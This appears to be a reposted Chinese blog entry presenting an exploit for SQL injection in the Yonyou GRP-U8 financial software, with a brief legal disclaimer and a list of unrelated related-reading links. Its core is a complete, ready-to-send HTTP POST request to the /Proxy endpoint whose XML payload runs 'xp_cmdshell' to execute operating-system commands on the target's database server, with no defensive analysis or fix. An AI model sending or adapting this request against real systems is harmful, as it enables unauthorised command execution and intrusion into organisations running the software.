用友GRP-u8 SQL注入

请遵守网络安全法！！！本文仅供学习交流使用！用于任何非授权渗透、非法目的攻击、从事非法活动均与笔者无关！读者自行承担其恶果！

EXP

POST /Proxy HTTP/1.1
Accept: Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;)
Host: x.x.x.x
Content-Length: 357
Connection: Keep-Alive
Cache-Control: no-cache

cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">exec xp_cmdshell 'net user'</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>

Example

查看全文

相关阅读:
ping和telnet
nginx下No input file specified错误的解决
 【Git】删除某个全局配置项
 windows7使用Sphinx+PHP+MySQL详细介绍
 TortoiseGit需要重复填写用户名和密码的问题
 【算法】字符串数组的排序时间复杂度问题
 java随机生成6位随机数 5位随机数 4位随机数
 Linux下MySQL报Table 'xxx' doesn't exist错误解决方法，表名存在大小写区分
 Cannot find ./catalina.sh The file is absent or does not have execute permission This file is nee
Linux 服务器安装jdk,mysql,tomcat简要教程

原文地址：https://www.cnblogs.com/Yang34/p/13653960.html